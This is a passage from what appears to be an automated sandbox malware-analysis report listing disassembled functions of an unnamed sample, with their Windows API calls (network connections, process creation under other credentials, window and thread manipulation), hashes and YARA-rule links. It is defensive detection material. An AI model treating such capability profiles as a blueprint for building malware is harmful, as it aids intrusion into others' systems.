Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 90f7f123bfe63a15d0c360d419b5c13cb09b3ae72d5020dae9d2c73e46e79c71
Instruction ID: 6bb5880d9803533787805209fcbee8354b4801578c85044dd767400d21442894
Opcode Fuzzy Hash: 90f7f123bfe63a15d0c360d419b5c13cb09b3ae72d5020dae9d2c73e46e79c71
Instruction Fuzzy Hash: D6316E31600256AFDF229E75CC45BBA7BAAFF41320F198529F869871A0F730D851DBB1

Function 00DA7AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00DA7AB6

Part of subcall function 00D869C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D869E3
Part of subcall function 00D869C9: GetCurrentThreadId.KERNEL32 ref: 00D869EA
Part of subcall function 00D869C9: AttachThreadInput.USER32(00000000,?,00D88127), ref: 00D869F1

GetCaretPos.USER32(?), ref: 00DA7AC7
ClientToScreen.USER32(00000000,?), ref: 00DA7B00
GetForegroundWindow.USER32 ref: 00DA7B06

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 4a1f75f13d5a0c0af195e97d9c810e91fbbd0d118534e94f6b2fb67b75f6c34c
Instruction ID: d92adc7fa90bd2ff07c031ba37a5e1b316734b4d7a6a784578bb33f7941e6f31
Opcode Fuzzy Hash: 4a1f75f13d5a0c0af195e97d9c810e91fbbd0d118534e94f6b2fb67b75f6c34c
Instruction Fuzzy Hash: 04310371D00109AFDB00EFB5DC859EFBBF9EF55314B10806AE816E7251EA359E098BB0

Function 00D9497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00D949B7

Part of subcall function 00D94A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00D94A60
Part of subcall function 00D94A41: InternetCloseHandle.WININET(00000000), ref: 00D94AFD

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 398c0a8dbc33f79f757f96b395b4c65c39188613f1c2de029c2af11e84efbf7f
Instruction ID: 446dc9dac0985a6c175b91eabc633d9f4ef57f570e00b64b40449ffc1e5448a6
Opcode Fuzzy Hash: 398c0a8dbc33f79f757f96b395b4c65c39188613f1c2de029c2af11e84efbf7f
Instruction Fuzzy Hash: CD21F231240702BBDF129F608C00FBBB7AAFB48705F14411EFA4696251EB31D812ABB4

Function 00D7BC90 Relevance: 6.1, APIs: 4, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00D7BCD9
OpenProcessToken.ADVAPI32(00000000), ref: 00D7BCE0
CloseHandle.KERNEL32(00000004), ref: 00D7BCFA
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D7BD29

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
String ID:
API String ID: 2621361867-0
Opcode ID: 0fe85415695e85b64cbf8528be79a8e37829881567d88b20890320a3969688d2
Instruction ID: 9a0fc574a1e9173a7fbef6655741beb226d522218b9dfedba4ce3db65c797d61
Opcode Fuzzy Hash: 0fe85415695e85b64cbf8528be79a8e37829881567d88b20890320a3969688d2
Instruction Fuzzy Hash: 6421507210020AABDF129FA8DD49FEE7BA9EF44314F148066FE05A6160E776CD61DB70

Function 00DA8834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00DA88A3
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DA88BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DA88CB
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00DA88D9

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 4c3b2378d19a118bdd2a153a7a7dde09820a5199b63c1ce56c5d01ec54841002
Instruction ID: 0b7ee8b1f1ad467541b0aba794fc0d2a32b9ac386a827d5443bfb7c1992a51fa
Opcode Fuzzy Hash: 4c3b2378d19a118bdd2a153a7a7dde09820a5199b63c1ce56c5d01ec54841002
Instruction Fuzzy Hash: 6C118131745115AFDB14AB28DC05FAA7BAAEF86321F144119F916C72E1DF74AC00DBB0

Function 00D9900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00D9906D
__WSAFDIsSet.WS2_32(00000000,00000001), ref: 00D9907F
accept.WS2_32(00000000,00000000,00000000), ref: 00D9908C
WSAGetLastError.WS2_32(00000000), ref: 00D990A3

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: bdb565dab28b5c9df204108c7781e2486bfda65fbe0b2aa62b3d1947d915298d
Instruction ID: df90c982621d64af9d2e36850a1d9bf4b00618288d909108f427a25dc2775f09
Opcode Fuzzy Hash: bdb565dab28b5c9df204108c7781e2486bfda65fbe0b2aa62b3d1947d915298d
Instruction Fuzzy Hash: 08216271900225AFCB109F69CC95A9EBBFCEF49750F04816AF84AD7290DA749A458BB0

Function 00D818E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D82CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00D818FD,?,?,?,00D826BC,00000000,000000EF,00000119,?,?), ref: 00D82CB9
Part of subcall function 00D82CAA: lstrcpyW.KERNEL32(00000000,?,?,00D818FD,?,?,?,00D826BC,00000000,000000EF,00000119,?,?,00000000), ref: 00D82CDF
Part of subcall function 00D82CAA: lstrcmpiW.KERNEL32(00000000,?,00D818FD,?,?,?,00D826BC,00000000,000000EF,00000119,?,?), ref: 00D82D10

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00D826BC,00000000,000000EF,00000119,?,?,00000000), ref: 00D81916
lstrcpyW.KERNEL32(00000000,?,?,00D826BC,00000000,000000EF,00000119,?,?,00000000), ref: 00D8193C
lstrcmpiW.KERNEL32(00000002,cdecl,?,00D826BC,00000000,000000EF,00000119,?,?,00000000), ref: 00D81970

Strings

cdecl, xrefs: 00D81967

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 739b902383105767ca32b66d5e71283bdc98d154e946eedc56c3d54a1da9e5fe
Instruction ID: c020d02420224b31967890830c55be79e54dac8d2e8ceb7b225d12711d352417
Opcode Fuzzy Hash: 739b902383105767ca32b66d5e71283bdc98d154e946eedc56c3d54a1da9e5fe
Instruction Fuzzy Hash: FE11BE3A100306AFCB15BF34CC55E7A77A9FF45350B44802AF80ACB260EB3199468BB0

Function 00D8713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00D8715C
_memset.LIBCMT ref: 00D8717D
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00D871CF
CloseHandle.KERNEL32(00000000), ref: 00D871D8

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 49136b91398b933cc5819f36570207e97be50cd15295cf7909d90f1a16dcd371
Instruction ID: 5bd1a0d84eea27e6c9e1cf095823b5589d6d8c1abcf1f32dc0e0ab06b823967e
Opcode Fuzzy Hash: 49136b91398b933cc5819f36570207e97be50cd15295cf7909d90f1a16dcd371
Instruction Fuzzy Hash: 4911CA769013287AD7206B65AC4DFEBBA7CEF45760F1441AAF504E72D0D2748E808BB4

Function 00D813D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00D813EE
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00D81409
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00D8141F
FreeLibrary.KERNEL32(?), ref: 00D81474

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Type$FileFreeLibraryLoadModuleNameRegister
String ID:
API String ID: 3137044355-0
Opcode ID: 1372f78b80108a125fe4d39b5dbf91376a4f58447e739f4d9dbfaa8e5acc7c2d
Instruction ID: 94875faa1c3b0a5a273b9d969cf012f7a7400ba294f643b5000633e28012ba78
Opcode Fuzzy Hash: 1372f78b80108a125fe4d39b5dbf91376a4f58447e739f4d9dbfaa8e5acc7c2d
Instruction Fuzzy Hash: D7217F7950030AABDB20AF95DC88EDABBBCEF00744F008569E55297150D774EA4ADF71

Function 00D7C265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00D7C285
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D7C297
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D7C2AD
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D7C2C8

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 2a7ea6926cb258c5818e8c973281d8299b02a07ac3e539a3b0f92411eb9d1f66
Instruction ID: 670b461831660beefedc7951a3ab05281b1d03989f034743d564f15d3336876f
Opcode Fuzzy Hash: 2a7ea6926cb258c5818e8c973281d8299b02a07ac3e539a3b0f92411eb9d1f66
Instruction Fuzzy Hash: 1A112A7A941218FFDB11DFE8CC85E9DBBB4FB08710F204095EA04B7294E671AE10DBA4

Function 00D87C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00D87C6C
MessageBoxW.USER32(?,?,?,?), ref: 00D87C9F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00D87CB5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00D87CBC

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 72429cba2d101bcb06ab13e1ebd6bd2720227a14a379226942a23d743a425fb7
Instruction ID: 0b7043e48fdec7652d1a2ca83d4aa8315ea9909e9e6a58693d4d03ef2f21e975
Opcode Fuzzy Hash: 72429cba2d101bcb06ab13e1ebd6bd2720227a14a379226942a23d743a425fb7
Instruction Fuzzy Hash: 86110472A04305BFC702ABB9DC08EAA7FAE9B44325F184225F865E3391D771C94887B0

Function 00D5C619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D5C657
GetStockObject.GDI32(00000011), ref: 00D5C66B
SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5C675

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: f734c92e00be7805403fd70ff93293b090dec131d6ba52f69417ec340ba88f46
Instruction ID: 7295b5c0b7bec2dbd63dce2a91b570c7d36e58b6a68ced82f8b3a170f2d8a4ef
Opcode Fuzzy Hash: f734c92e00be7805403fd70ff93293b090dec131d6ba52f69417ec340ba88f46
Instruction Fuzzy Hash: 1F11A17251174ABFDF114FA09C44EEA7B69EF08355F095111FE0492120C732DD60DBB1

Function 00D849D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00D8354D,?,00D845D5,?,00008000), ref: 00D849EE
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00D8354D,?,00D845D5,?,00008000), ref: 00D84A13
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00D8354D,?,00D845D5,?,00008000), ref: 00D84A1D
Sleep.KERNEL32(?,?,?,?,?,?,?,00D8354D,?,00D845D5,?,00008000), ref: 00D84A50

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: d3c6ec7d434d42afdb308e461fb9a42ba9a2f31b2c328139dba2bbff0459543d
Instruction ID: 17f25f9d40bbb460a9b2f2f08db385e9f0d126466b2aef321ea9aebd86c0f8ff
Opcode Fuzzy Hash: d3c6ec7d434d42afdb308e461fb9a42ba9a2f31b2c328139dba2bbff0459543d
Instruction Fuzzy Hash: D7115A31D4061ADBCF04AFE5DA88AEEBB78FF08705F054059E941BA240CB309650CBB9

Function 00D75BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00D75BC6

Part of subcall function 00D762A5: __fltout2.LIBCMT ref: 00D762CE

__cftog_l.LIBCMT ref: 00D75BEC
__cftoe_l.LIBCMT ref: 00D75C1E

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 666b1dc6f024782fbf4a7696f715ba12f597dcc2bd7e2c5719b6c8c51d6d2b53
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: EC014E3200064EBBCF125E84EC41DEE3F62FB18350B588515FE1C59035E276C9B1ABA2

Function 00D680E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D6869D: __getptd_noexit.LIBCMT ref: 00D6869E

__lock.LIBCMT ref: 00D6811F
InterlockedDecrement.KERNEL32(?), ref: 00D6813C
_free.LIBCMT ref: 00D6814F
InterlockedIncrement.KERNEL32(011678B0), ref: 00D68167

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: e24027fb457f39b0feb1a5314ba5441f87eb722103ed81f579dff0e3147c0ad3
Instruction ID: 9994436c63fbe107fde06ff0bf869a9cf51d311af4a8ba57659ea84915f84731
